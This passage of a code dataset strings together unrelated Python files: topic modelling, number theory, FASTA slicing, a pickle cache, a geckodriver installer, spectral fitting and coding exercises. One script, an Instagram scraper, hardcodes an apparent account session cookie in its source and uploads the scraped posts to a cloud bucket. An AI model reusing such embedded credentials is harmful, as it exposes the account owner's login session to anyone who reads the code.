n_iter=n_iter, random_state=random_state)\n\n        self.n_file = None\n        self.n_word = None\n\n    def load_X(self, fpath):\n        self.X = np.load(fpath)\n        self.n_file = self.X.shape[0]\n        self.n_word = self.X.shape[1]\n        return self.X\n\n    def load_word_vector(self, fpath):\n        with open(fpath, \"r\", encoding='utf-8') as f:\n            self.word_vector = f.read().split()\n        return self.word_vector\n\n    def fit(self):\n        self.model.fit(self.X)\n\n    def save_topic_words(self, n_words=20):\n        topic_word = self.model.topic_word_\n        with open(\"dataset/output/topic_words.txt\", \"w\") as f:\n            for i, topic_dist in enumerate(topic_word):\n                topic_words = []\n                for index in np.argsort(topic_dist)[:-(n_words + 1):-1]:\n                    topic_words.append(self.word_vector[index])\n                f.write(\"Topic\"+str(i)+\":\\t\"+\"\\t\".join(topic_words)+\"\\n\")\n\n    def save_doc_topic(self, fpath=1):\n        doc_topic = self.model.doc_topic_\n        first_topics = []\n        second_topics = []\n        for i in range(self.n_file):\n            first_topic = np.argsort(doc_topic[i])[-1]\n            second_topic = np.argsort(doc_topic[i])[-2]\n            first_topics.append(first_topic)\n            second_topics.append(second_topic)\n        f = data.ExcelProcessor(1)\n        f.write_topic(first_topics, second_topics)\n\n    def info_X(self):\n        n_word = np.sum(self.X, axis=0)\n        N = len(n_word)\n        print(N)\n        index_1 = np.where(n_word == 1)[0]\n        index_10 = np.where(n_word < 11)[0]\n        index_20 = np.where(n_word < 21)[0]\n\n        print(f\"1:\\t{len(index_1)}\\t{len(index_1)/N}\")\n        print(f\"10:\\t{len(index_10)}\\t{len(index_10)/N}\\t\")\n        print(f\"20:\\t{len(index_20)}\\t{len(index_20)/N}\\t\")\n\n\n\n\n","repo_name":"Haoran-Jia/COVID-19-literature-analyse","sub_path":"LDA.py","file_name":"LDA.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14148373237","text":"import sys\r\nimport 
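# Editor's cross-check for the extended-Euclid inverse implemented below:
# since Python 3.8, pow(b, -1, a) computes the same modular inverse
# (and raises ValueError when gcd(a, b) != 1).
assert pow(7, -1, 26) == 15 and (7 * 15) % 26 == 1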
gcdE\r\n\r\n\r\n#compute inverse of b % a(Find inverse of b when modding by a)\r\ndef computeInverse(a,b,log=False):\r\n if b == 0:\r\n return 0\r\n if b > a:\r\n if log:\r\n print(\"Error! a should be more than b!\")\r\n print(\"Getting congruence class of b\")\r\n print(f\"b = {b} % {a}\")\r\n b = b % a\r\n if log:\r\n print(f\"b is now {b}\")\r\n\r\n gcdVal, u, v = gcdE.gcdE(a,b,log)\r\n if log:\r\n print(f\"GCD = {gcdVal}, u = {u}, v = {v}\")\r\n\r\n if gcdVal == 1:\r\n inverse = v % a\r\n if log:\r\n print(f\"Inverse = {v} % {a} = {inverse}\")\r\n print(f\"Inverse of {b} % {a} = {inverse}\")\r\n return inverse\r\n else:\r\n if log:\r\n print(f\"{b} % {a} has no inverse\")\r\n return b\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) != 3:\r\n print(\"Usage: \" + sys.argv[0] + \" b a\")\r\n quit()\r\n b = int(sys.argv[1])\r\n a = int(sys.argv[2])\r\n print(computeInverse(a,b,True))\r\n ","repo_name":"drg101/M360-algos","sub_path":"computeInverse.py","file_name":"computeInverse.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5928185225","text":"#!/usr/bin/env python\n\n\nimport os\nimport sys\nfrom argparse import ArgumentParser\nfrom Bio import SeqIO\n\ndef parseArgs():\n\tparser = ArgumentParser(description='Slices out a single sequence from a '\n\t'FastA file', add_help=False)\n\treq = parser.add_argument_group('Required')\n\treq.add_argument('-i', '--infile', required=True, metavar='FILE',\n\t\ttype=str, help='input FastA sequence file')\n\treq.add_argument('-d', '--defline', required=True, metavar='STR',\n\t\ttype=str, help='header/defline name for target sequence record to '\n\t\t'slice out sequences from')\n\treq.add_argument('-b', '--begin', required=True, metavar='INT', type=int,\n\t\thelp='initial position to extract from the specified sequence record')\n\treq.add_argument('-e', '--end', required=True, metavar='INT', type=int,\n\t\thelp='final position to extract from the specified sequence record')\n\topt = parser.add_argument_group('Optional')\n\topt.add_argument('-h', '--help', action='help',\n\t\thelp='show this help message and exit')\n\topt.add_argument('-m', '--defline-query-method', required=False,\n\t\ttype=str, default='substr', choices=['full', 'substr'],\n\t\thelp='search method for header/defline name [substr]')\n\topt.add_argument('-o', '--outfile', required=False, metavar='FILE',\n\t\tdefault=None, help='FastA-formatted sliced output [stdout]')\n\treturn parser.parse_args()\n\ndef main():\n\topt = parseArgs()\n\tifh = os.path.abspath(opt.infile)\n\tget = (opt.defline, opt.begin-1, opt.end)\n\n\t# Find seq record\n\tmfa = SeqIO.parse(ifh, 'fasta')\n\tfnd = []\n\tif opt.defline_query_method == 'full':\n\t\tfor rec in mfa:\n\t\t\tif str(get[0]) == rec.description:\n\t\t\t\tfnd.append(rec)\n\telif opt.defline_query_method == 'substr':\t\t\n\t\tfor rec in mfa:\n\t\t\tif str(get[0]) in rec.description:\n\t\t\t\tfnd.append(rec)\n\telse:\n\t\tsys.stderr.write('ERROR: unsupported {} search method; argparse '\n\t\t\t'should have prevented this\\n'.format(opt.defline_query_method))\n\t\tsys.exit(1)\n\n\t# Halt if anything but one seq record match found\n\tif len(fnd) > 1:\n\t\tsys.stderr.write('ERROR: >1 defline match to {}\\n'.format(get[0]))\n\t\tsys.exit(1)\n\telif len(fnd) == 0:\n\t\tsys.stderr.write('ERROR: {} absent from deflines\\n'.format(get[0]))\n\t\tsys.exit(1)\n\n\t# Slice seq record\n\tout = fnd[0][get[1]:get[2]]\n\n\t# Output\n\tif 
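# Editor's plain-string illustration (not from the original script) of the
# begin-1/end pair built above: it turns 1-based inclusive coordinates into
# Python's 0-based half-open slices.
seq = "ACGTACGT"
begin, end = 2, 5                    # 1-based inclusive -> expect "CGTA"
assert seq[begin - 1:end] == "CGTA"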
opt.outfile is not None:\n\t\tofh = os.path.abspath(os.path.expanduser(opt.outfile))\n\t\tSeqIO.write(out, ofh, 'fasta')\n\telse:\n\t\tSeqIO.write(out, sys.stdout, 'fasta')\n\nif __name__ == '__main__':\n\tmain()","repo_name":"chrisgulvik/genomics_scripts","sub_path":"slice.fasta.py","file_name":"slice.fasta.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"72697536107","text":"import base64\nimport os\nimport pandas as pd\nimport pickle\nimport random\nimport hashlib\nimport dill\n\nclass DataModelManager:\n def __init__(self, lookup_table_file=\"data_model_table.csv\", lookup_table_folder=\"data_models\", random_seed=1000):\n self.lookup_table_folder = lookup_table_folder\n self.lookup_table_file = os.path.join(self.lookup_table_folder, lookup_table_file)\n self.random_seed = random_seed\n\n def encode(self, datatype=\"model\", return_pickle=True, return_compact=False):\n \"\"\"\n\n Parameters\n ----------\n return_compact : boolean\n Returns a compact version of the encoded data which is formed from the first+last ten characters\n of the encoded.\n\n \"\"\"\n\n data_params = datatype\n encoded_message = hashlib.sha1(str.encode(data_params))\n encode_data_name = encoded_message.hexdigest()\n encode_data_name = encode_data_name.replace('b', '')\n encode_data_name = encode_data_name.replace(\"'\", '')\n\n # perform shuffling\n random.seed(self.random_seed)\n encode_data_name = list(encode_data_name)\n random.shuffle(encode_data_name)\n encode_data_name = ''.join(encode_data_name)\n if return_compact and len(encode_data_name)>=20:\n return encode_data_name[:10]+encode_data_name[-10:] + (\".p\" if return_pickle else \"\")\n else:\n return encode_data_name + (\".p\" if return_pickle else \"\")\n\n def update_csv(self, datatype=\"model\"):\n encode_data_name = self.encode(datatype, return_pickle=True, return_compact=False)\n decode_data = datatype\n if not os.path.exists(self.lookup_table_folder):\n os.mkdir(self.lookup_table_folder)\n\n if not os.path.exists(self.lookup_table_file):\n next_file_name = str(1).zfill(5) + '.p'\n new_df = pd.DataFrame(\n {\"filename\": [next_file_name], \"encoded\": [encode_data_name], \"decoded\": [decode_data]})\n new_df.to_csv(self.lookup_table_file, index=False)\n else:\n csv_df = pd.read_csv(self.lookup_table_file)\n current_file_number = int(csv_df['filename'].iloc[-1].split('.')[0])\n next_file_name = str(current_file_number + 1).zfill(5) + '.p'\n new_df = pd.DataFrame(\n {\"filename\": [next_file_name], \"encoded\": [encode_data_name], \"decoded\": [decode_data]})\n csv_df = csv_df.append(new_df)\n csv_df.to_csv(self.lookup_table_file, index=False)\n\n def load_csv(self):\n if not os.path.exists(self.lookup_table_file):\n print(\"No csv table exist yet for data model.\")\n return -1\n else:\n return pd.read_csv(self.lookup_table_file)\n\n def get_pickle_name(self, datatype=\"model\"):\n csv_df = self.load_csv()\n encode_data_name = self.encode(datatype, return_pickle=True, return_compact=False)\n try:\n pickled_file_name = csv_df.loc[csv_df['encoded'] == encode_data_name]['filename'].values[0]\n return pickled_file_name\n except Exception as e:\n print(e)\n return -1\n\n def load_model(self, datatype=\"model\"):\n print(self.lookup_table_folder)\n print(self.get_pickle_name(datatype))\n with open(os.path.join(self.lookup_table_folder, self.get_pickle_name(datatype)), mode=\"rb\") as f:\n return dill.load(f)\n\n def load_encoded_model(self, 
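# Editor's condensed sketch of the encode() scheme above (same idea, fewer
# steps): hash the key, shuffle with a fixed seed, and the key-to-filename
# mapping stays deterministic across runs.
import hashlib, random
def _enc(key, seed=1000):
    chars = list(hashlib.sha1(key.encode()).hexdigest())
    random.seed(seed)
    random.shuffle(chars)
    return "".join(chars) + ".p"
assert _enc("model") == _enc("model")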
encoded=\"\"):\n csv_df = self.load_csv()\n pickled_file_name = csv_df.loc[csv_df['encoded'] == encoded]['filename'].values[0]\n with open(os.path.join(self.lookup_table_folder, pickled_file_name), mode=\"rb\") as f:\n return dill.load(f)\n\n def save_model(self, model, datatype=\"model\"):\n self.update_csv(datatype)\n with open(os.path.join(self.lookup_table_folder, self.get_pickle_name(datatype)), mode=\"wb\") as f:\n dill.dump(model, f)\n\n def exist_model(self, datatype=\"model\"):\n if self.get_pickle_name(datatype) == -1:\n return False\n else:\n return True\n\n def wrap(self, method, datatype=\"data\", *args, **data_params):\n if self.exist_model(method.__name__+datatype):\n print(\"Data model existed, loading from pickle...\")\n x = self.load_model(datatype=method.__name__+datatype)\n else:\n x = method(*args, **data_params)\n print(\"Saving data model...\")\n self.save_model(x, datatype=method.__name__+datatype)\n return x\n","repo_name":"bangxiangyong/baetorch","sub_path":"baetorch/util/data_model_manager.py","file_name":"data_model_manager.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"6011548321","text":"import requests\nfrom bs4 import BeautifulSoup\nimport platform\nimport os\nfrom zipfile import ZipFile\nimport shutil\n\ncurrent_os = str(platform.system())\n\ndef get_gecko_pkg_name():\n #navigate to latest geckodriver release page\n page = requests.get(\"https://github.com/mozilla/geckodriver/releases/latest\")\n pagesoup = BeautifulSoup(page.content, 'html.parser')\n\n latest_version = \"v\" + pagesoup.find('h2').text.split()[0] #extract latest version\n\n current_sys_arch = platform.architecture()[0] \n\n #determine the system arch of file to download\n if current_os.lower() == \"windows\":\n if current_sys_arch == \"64bit\":\n pkg_arch = \"win64\"\n elif current_sys_arch == \"32bit\":\n pkg_arch = \"win32\"\n \n extension = \"zip\"\n \n elif current_os.lower() == \"linux\":\n if current_sys_arch == \"64bit\":\n pkg_arch = \"linux64\"\n elif current_sys_arch == \"32bit\":\n pkg_arch = \"linux32\"\n \n extension = \"tar.gz\"\n\n gecko_pkg_name = f\"geckodriver-{latest_version}-{pkg_arch}.{extension}\"\n\n return gecko_pkg_name\n\ndef create_folder(to_location):\n #make a new folder to download to (if one doesn't already exist)\n new_folder = os.path.join(to_location, r'geckodriver')\n if not os.path.exists(new_folder):\n os.makedirs(new_folder)\n \n return new_folder #path to where the file will be downloaded\n\ndef download_package(download_path, gecko_dl_link, gecko_package_name):\n #download the package\n save_as = os.path.join(download_path, gecko_package_name) #save file as\n\n if not os.path.exists(save_as):\n r = requests.get(gecko_dl_link, stream=True)\n with open(save_as, 'wb') as fd:\n for chunk in r.iter_content(chunk_size=128):\n fd.write(chunk)\n \n return save_as #path to downloaded zip\n\n\ndef extract_zip(gecko_zip, geckodriver_dir):\n #extract zip file\n gecko_file = os.path.join(geckodriver_dir, r\"geckodriver.exe\")\n\n if os.path.exists(gecko_file): #remove file if file already exists\n os.remove(gecko_file)\n \n with ZipFile(gecko_zip, 'r') as zip:\n zip.extractall(geckodriver_dir) #extract content to geckodriver_dir\n\n return gecko_file\n\ndef extract_tar_gz(gecko_tar_gz, geckodriver_dir):\n #extract *.tar.gz\n gecko_file = os.path.join(geckodriver_dir, r\"geckodriver\")\n\n if os.path.exists(gecko_file):\n os.remove(gecko_file)\n\n 
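# Editor's self-contained round-trip (temporary files only, not the real
# geckodriver package) showing why one call works for both formats below:
# shutil.unpack_archive infers the archive type from the file extension.
import pathlib, tempfile
with tempfile.TemporaryDirectory() as _d:
    _src = pathlib.Path(_d, "payload"); _src.mkdir()
    (_src / "geckodriver").write_text("stub")
    _pkg = shutil.make_archive(str(pathlib.Path(_d, "pkg")), "gztar", _src)
    shutil.unpack_archive(_pkg, str(pathlib.Path(_d, "out")))
    assert (pathlib.Path(_d, "out") / "geckodriver").read_text() == "stub"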
shutil.unpack_archive(gecko_tar_gz, geckodriver_dir) #extract *.tar.gz\n\n    return gecko_file\n\ndef add_to_PATH(path_of_dir):\n    if path_of_dir not in os.environ['PATH']: #add the dir containing geckodriver to PATH\n        os.environ['PATH'] = os.environ['PATH'] + os.pathsep + path_of_dir\n\ndef install(to_location):\n    package_name = get_gecko_pkg_name()\n    gecko_dl_link = f\"https://github.com/mozilla/geckodriver/releases/latest/download/{package_name}\" #use the 'latest' redirect so the version in the URL matches the scraped asset name\n\n    geckodriver_dir = create_folder(to_location)\n\n    gecko_pkg = download_package(geckodriver_dir, gecko_dl_link, package_name) #download zip file to download_path\n\n    if current_os.lower() == \"windows\":\n        gecko_file = extract_zip(gecko_pkg, geckodriver_dir) #extracts downloaded zip\n    elif current_os.lower() == \"linux\":\n        gecko_file = extract_tar_gz(gecko_pkg, geckodriver_dir) #extracts downloaded tar.gz file\n\n    add_to_PATH(geckodriver_dir) #add geckodriver to path","repo_name":"gandalf-the-lonesome/animepahe-dlr","sub_path":"animepahe_dlr/gecko_installer.py","file_name":"gecko_installer.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"6374076871","text":"import numpy as n\nimport matplotlib as m\nm.interactive(True)\nfrom matplotlib import pyplot as p\nfrom astropy.io import fits\nimport os\nimport pixelsplines as pxs\n\n# Script to test new SSPs from Charlie Conroy, obtained 2014A\n#\n# Written by A. Bolton, U. of Utah\n\n# Set these environment variables:\n# export BOSS_SPECTRO_REDUX=/data/BOSS/redux/dr10mini\n# export RUN2D=v5_5_12\n# export RUN1D=v5_5_12\n# export SSP_DATA_DIR=/data/SSP\n\n# Get a spectrum to work with:\nplate = 4388\nmjd = 55536\nspf = os.getenv('BOSS_SPECTRO_REDUX') + '/' + os.getenv('RUN2D') + \\\n    '/' + str(plate) + '/spPlate-' + str(plate) + '-' + str(mjd) + '.fits'\n\nflux = fits.getdata(spf, 0)\ninvvar = fits.getdata(spf, 1)\nhdr = fits.getheader(spf)\nloglam = hdr['COEFF0'] + hdr['COEFF1'] * n.arange(hdr['NAXIS1'])\nn_fib, n_data = flux.shape\nifiber = 100\np.plot(10**loglam, flux[ifiber], hold=False)\n\n\n# Get the solar-metallicity SSP:\nsspf = os.getenv('SSP_DATA_DIR') + '/SSP_Padova_CKC14_new_Kroupa_Z0.0190.out.fits'\nssp_data = fits.getdata(sspf, 1)\nssp_meta = fits.getdata(sspf, 2)\nssp_wave = ssp_data['LAMBDA'][0].copy()\nssp_flux = ssp_data['SPEC'][0].copy()\nn_age, n_pix = ssp_flux.shape\n\n# Convert from fnu to flambda with arbitrary normalization:\nfor i in range(n_age):\n    ssp_flux[i] /= ssp_wave**2\n    ssp_flux[i] /= n.median(ssp_flux[i])\n\n# Check it out, to see if it looks like we expect:\ni_age = 170\np.plot(ssp_wave, ssp_flux[i_age], hold=False)\np.xlim(1800.,11000.)\n\n\n# Pick out some wavelength range of interest:\n# Nah, not worth it...\n#lam_lo = 1750.\n#lam_hi = 11000.\n#ilam_lo = min(n.where(ssp_wave >= lam_lo)[0])\n#ilam_hi = max(n.where(ssp_wave <= lam_hi)[0])\n\n# Does a blur matrix at this stage give us something tractable?\nvdisp = 225. 
# (in km/s)\nc_in_km_per_s = 299792.458\nsigconv = ssp_wave * vdisp / c_in_km_per_s\nssp_bound = pxs.cen2bound(ssp_wave)\ngblur = pxs.gauss_blur_matrix(ssp_bound, sigconv)\n\nssp_blur = gblur * ssp_flux[i_age]\np.plot(ssp_wave, ssp_flux[i_age], hold=False)\np.plot(ssp_wave, ssp_blur, hold=True)\np.xlim(1800.,11000.)\n\n# Looks good.\n# Now let's bin it down to the BOSS coadd resoultion\n# and dial in the wavelength range we want.\nsspSpline = pxs.PixelSpline(ssp_bound, ssp_blur)\n\nssp_coeff0 = 3.225\nssp_coeff1 = 0.0001\nssp_naxis1 = 2**13\nssp_loglam = ssp_coeff0 + ssp_coeff1 * n.arange(ssp_naxis1)\nprint(10.**ssp_loglam.min(), 10.**ssp_loglam.max())\nssp_logbound = pxs.cen2bound(ssp_loglam)\nssp_wavebound = 10.**ssp_logbound\n\nssp_boss = sspSpline.resample(ssp_wavebound)\n\np.plot(10.**ssp_loglam, ssp_boss, hold=False)\n\n# Test speed of FFTs from Numpy:\njunk1 = n.random.uniform(size=2**17)\njunk2 = n.random.uniform(size=(2**17-1))\nf_junk1 = n.fft.fft(junk1)\nf_junk2 = n.fft.fft(junk2)\n# It definitely matters to have power-of-two!!\n\n# Another test of the FFT convolution convention:\njunk1 = n.zeros(128, dtype=float)\njunk2 = n.zeros(128, dtype=float)\njunk1[0] = 1.\njunk2[0] = 2.\nf_junk1 = n.fft.fft(junk1)\nf_junk2 = n.fft.fft(junk2)\njunk3 = n.fft.ifft(f_junk1 * f_junk2)\n\n# Yet another test of the FFT convolution convention:\njunk1 = n.random.uniform(size=128)\njunk2 = n.random.uniform(size=128)\nf_junk1 = n.fft.fft(junk1)\nf_junk2 = n.fft.fft(junk2)\njunk3 = n.fft.ifft(f_junk1.conj() * f_junk2).real\njunk4 = n.convolve(junk1, junk2)\n\np.plot(junk3, hold=False)\np.plot(junk4, hold=True)\n\n\n# And another test of the FFT convolution convention:\njunk1 = n.random.uniform(size=128)\njunk2 = 0.1*n.random.uniform(size=128)\n#f_junk1 = n.fft.fft(junk1)\n#f_junk2 = n.fft.fft(junk2)\n#junk3 = n.fft.ifft(f_junk1 * f_junk2).real\nf_junk1 = n.fft.fft(junk1)\nf_junk2 = n.fft.fft(junk2)\njunk3 = n.fft.ifft(f_junk1 * f_junk2.conj()).real\njunk4 = n.zeros(128,dtype=float)\nfor i in range(128):\n junk4[i] = n.sum(junk1 * n.roll(junk2,i))\n\np.plot(junk3, hold=False)\np.plot(junk4, hold=True)\n\n# OK, that does what we want, I think!!\n\n\n\n# Make a padded version of the data and invvar:\ndata_pad = n.zeros(ssp_naxis1, dtype=float)\ndata_pad[0:len(flux[ifiber])] = flux[ifiber]\ninvvar_pad = n.zeros(ssp_naxis1, dtype=float)\ninvvar_pad[0:len(invvar[ifiber])] = invvar[ifiber]\n\n# Generate simple polynomial basis:\nnpoly = 3\npoly_base = n.arange(ssp_naxis1, dtype=float) / float(ssp_naxis1-1)\npoly_set = n.zeros((npoly,ssp_naxis1), dtype=float)\nfor i in range(npoly):\n poly_set[i] = poly_base**i\n\n# The FFTs we need:\nivar_fft = n.fft.fft(invvar_pad)\nt_fft = n.fft.fft(ssp_boss)\nt2_fft = n.fft.fft(ssp_boss**2)\npoly_fft = n.zeros((npoly, ssp_naxis1), dtype=complex)\nfor i in range(npoly):\n poly_fft[i] = n.fft.fft(poly_set[i] * invvar_pad)\n\ndata_fft = n.fft.fft(data_pad * invvar_pad)\n\n# Build and populate the array of inversion matrices and right-hand sides:\nalpha_big = n.zeros((npoly+1,npoly+1,ssp_naxis1), dtype=float)\nrhs_big = n.zeros((npoly+1,ssp_naxis1), dtype=float)\nalpha_big[0,0] = n.fft.ifft(t2_fft * ivar_fft.conj()).real\nrhs_big[0] = n.fft.ifft(t_fft * data_fft.conj()).real\nfor i in range(npoly):\n alpha_big[i+1,0] = alpha_big[0,i+1] = n.fft.ifft(t_fft * poly_fft[i].conj()).real\n\nipoly_set = poly_set * invvar_pad.reshape((1,-1))\nalpha_poly = n.tensordot(poly_set, ipoly_set, (1,1))\nrhs_poly = n.sum(poly_set * data_pad.reshape((1,-1)) * invvar_pad.reshape((1,-1)), 
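# Editor's compact restatement of the convention the tests above establish:
# multiplying by the conjugate in Fourier space is circular cross-correlation,
# which is exactly what the redshift lag scan below exploits.
x, y = n.random.uniform(size=16), n.random.uniform(size=16)
lhs = n.fft.ifft(n.fft.fft(x) * n.fft.fft(y).conj()).real
rhs = n.array([n.sum(x * n.roll(y, k)) for k in range(16)])
assert n.allclose(lhs, rhs)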
axis=1)\n\nalpha_big[1:,1:] = alpha_poly.reshape((npoly,npoly,1)) * n.ones((1,1,ssp_naxis1))\nrhs_big[1:] = rhs_poly.reshape((npoly,1)) * n.ones((1,ssp_naxis1))\n\n# Test these to see if they give the same numbers as one expects\n# from straight calculation, for the zero-lag case:\nprint(n.sum(ssp_boss**2 * invvar_pad), alpha_big[0,0,0])\nprint(n.sum(ssp_boss * poly_set[0] * invvar_pad), alpha_big[0,1,0], alpha_big[1,0,0])\nprint(n.sum(ssp_boss * poly_set[1] * invvar_pad), alpha_big[0,2,0], alpha_big[2,0,0])\nprint(n.sum(ssp_boss * poly_set[2] * invvar_pad), alpha_big[0,3,0], alpha_big[3,0,0])\nprint(n.sum(ssp_boss * data_pad * invvar_pad), rhs_big[0,0])\nprint(n.sum(poly_set[1] * poly_set[2] * invvar_pad), alpha_big[2,3,0], alpha_big[3,2,0])\nprint(n.sum(poly_set[1] * data_pad * invvar_pad), rhs_big[2,0])\n\n# Number of redshifts to consider:\nn_z = ssp_naxis1 - n_data + 1\n\n# Here's where we find out if we're making sense...\nsn_squared = n.zeros(n_z, dtype=float)\n\nfor i in range(n_z):\n coeffs = n.linalg.solve(alpha_big[:,:,i], rhs_big[:,i])\n sn_squared[i] = n.dot(coeffs, n.dot(alpha_big[:,:,i], coeffs))\n\nchisq = n.sum(data_pad**2 * invvar_pad) - sn_squared\n\nbestlag = n.argmin(chisq)\n\nzbase = 10.**loglam[0] / 10.**ssp_loglam[0:n_z] - 1\n\nzbase[bestlag]\n\n# Revisit at the best lag and look explicitly at model:\nbest_coeffs = n.linalg.solve(alpha_big[:,:,bestlag], rhs_big[:,bestlag])\nbest_basis = n.zeros((npoly+1,n_data), dtype=float)\nbest_basis[0] = ssp_boss[bestlag:bestlag+n_data]\nbest_basis[1:] = poly_set[:,0:n_data]\nbest_model = n.dot(best_coeffs, best_basis)\np.plot(10.**loglam, flux[ifiber], hold=False)\np.plot(10.**loglam, best_model, hold=True)\n\nprint(n.sum((flux[ifiber]-best_model)**2 * invvar[ifiber]), chisq[bestlag])\n\n","repo_name":"timahutchinson/redmonster","sub_path":"python/redmonster/sandbox/test_ssp_2014.py","file_name":"test_ssp_2014.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"69878271787","text":"class Solution:\n def findLengthOfLCIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n res = 0\n anchor = 0\n i = 0\n while i < len(nums):\n if i > 0 and nums[i - 1] >= nums[i]:\n anchor = i\n else:\n res = max(res, i - anchor + 1)\n i += 1\n print(anchor, res)\n return res\n\n\nnums = [1, 2, 4, 3]\ns = Solution()\nprint(s.findLengthOfLCIS(nums))\n","repo_name":"hotheat/LeetCode","sub_path":"674. 
Longest Continuous Increasing Subsequence/better.py","file_name":"better.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9690112568","text":"import pandas as pd\nfrom instagramy import InstagramUser\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom google.cloud import storage\n\n\ndef main():\n print(\"starting function\")\n\n def upload_blob(bucket_name, blob_text, destination_blob_name):\n \"\"\"Uploads a file to the bucket.\"\"\"\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_string(blob_text, content_type='text/csv')\n\n print('File uploaded to {}.'.format(destination_blob_name))\n\n # Changement manuel du sessionid pour l'instant\n session_id = \"51744929721%3ARmvyDanBisbGGN%3A2\"\n instagram_target_username = 'selenagomez'\n\n user = InstagramUser(instagram_target_username, sessionid=session_id)\n\n # Récupération informations sur le compte\n infos_dict = defaultdict(list)\n\n infos_dict[\"username\"].append(user.username)\n infos_dict[\"biography\"].append(user.biography)\n infos_dict[\"number_of_followers\"].append(user.number_of_followers)\n infos_dict[\"number_of_followings\"].append(user.number_of_followings)\n infos_dict[\"number_of_posts\"].append(user.number_of_posts)\n infos_dict[\"is_verified\"].append(user.is_verified)\n\n infos_df = pd.DataFrame(infos_dict)\n infos_csv = infos_df.to_csv()\n # Créer un dataframe contenant tout ses posts dans un dataframe\n posts_dict = defaultdict(list)\n posts = user.posts\n\n for post in posts:\n # Ajouter à une list de numpy array, chacun des attributs dont on a besoin\n posts_dict[\"post_url\"].append(post.post_url)\n posts_dict[\"likes\"].append(post.likes)\n posts_dict[\"comments\"].append(post.comments)\n posts_dict[\"is_video\"].append(post.is_video)\n posts_dict[\"caption\"].append(post.caption)\n posts_dict[\"location\"].append(post.location)\n posts_dict[\"post_source\"].append(post.post_source)\n posts_dict[\"timestamp\"].append(datetime.fromtimestamp(post.timestamp))\n posts_dict[\"shortcode\"].append(post.shortcode)\n\n posts_df = pd.DataFrame(posts_dict)\n posts_csv = posts_df.to_csv()\n\n upload_blob('reda-bucket-tf', infos_csv, f'{instagram_target_username}-infos.csv')\n upload_blob('reda-bucket-tf', posts_csv, f'{instagram_target_username}-posts.csv')\n print(\"infos and posts sent to buckets\")\n\n\nmain()\n","repo_name":"reda-maizate/cloud-big-data","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36642096905","text":"'''\nWorkflow Timestamps\n1. 0:00 - 3:03 Make Sure You Understand the Problem\n2. 3:30 - 12:35 Design a Solution / Runtime and Space Complexity\n3. 12:35 - 17:05 Write a Template for Code in Logical Blocks. Aka Pseudocode\n4. 17:05 - 48:28 Write the Code And Pass Test Cases.\n'''\n'''\n1. Make Sure You Understand the Problem\n\n2. Design a Solution / Runtime and Space Complexity\nInitialize a map starting with first string as key, with an itslef as first value in list strs[0]:strs[0]. \nLoop through remaining strings. 
Get map.keys() and compare current string to each key\nuse a character-count key to check if two strings are anagrams: if an anagram, add to that key's values list, else add as a new key\nFor each value in map.values() append to output list\nRuntime: O(N * K) (N strings of length up to K)\nSpace: O(N * K)\n3. Write a Template for Code in Logical Blocks. Aka Pseudocode\n# Initialize anagrams map\nanagrams = {first string:List[first string]}\n\nfor s in strs[1:]:\n    check each string against anagrams.keys()\n    Create a count key from s\n    if the key exists add s to that key's values list\n    else add s as new key and add itself as first value in list\n\nanagrams_groups = []\n# Create output list \nfor value in anagrams.values():\n    anagrams_groups.append(value)\nreturn anagrams_groups\n4. Write the Code And Pass Test Cases.\n'''\n\ndef str_counts(s):\n    counts = [0] * 26\n\n    for c in s:\n        counts[ord(c) - ord('a')] += 1 \n\n\n    # Convert to string to use as hashable key\n    return str(counts)\n\nclass Solution:\n    def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n        # Initialize anagrams map with first string \n        anagrams = {str_counts(strs[0]):[strs[0]]}\n        \n        for s in strs[1:]:\n            s_counts = str_counts(s)\n            # Check whether an existing key is an anagram of the current s\n            if s_counts in anagrams:\n                anagrams[s_counts].append(s)\n            else:\n                # New anagram group: s becomes the first value in its list\n                anagrams[s_counts] = [s]\n        \n        return anagrams.values()","repo_name":"balanced-energy/leetcode","sub_path":"0049-group-anagrams/0049-group-anagrams.py","file_name":"0049-group-anagrams.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43321756795","text":"print(\"Hello World\")\n\nanswer = 42\nname = \"Python\"\n\nprint(f\"I have been developing in {name} for {answer} days\")\n\nnumber = 5\nif number == 5:\n    print(\"Number is 5\")\nelse:\n    print(\"Number is not 5\")\n\n\nmy_list = [\"John\", \"Luke\", \"Mary\", \"Joseph\"]\n\nlen(my_list)\ndel my_list[0]\n\nfor i in my_list:\n    print(\"The student is {0}\".format(i))\n\nx = 0\nwhile x <= 10:\n    print(\"Count is {0}\".format(x))\n    x += 1\n\nstudent = {\n    \"name\": \"Mark\",\n    \"student_id\": 123210,\n    \"feedback\": None\n}\n\ntry:\n    number_plus_name = name + answer\nexcept TypeError:\n    print(\"Cannot concatenate str and int\")\nexcept Exception as error: #Exception is too broad on its own\n    print(\"Unknown Error: \")\n    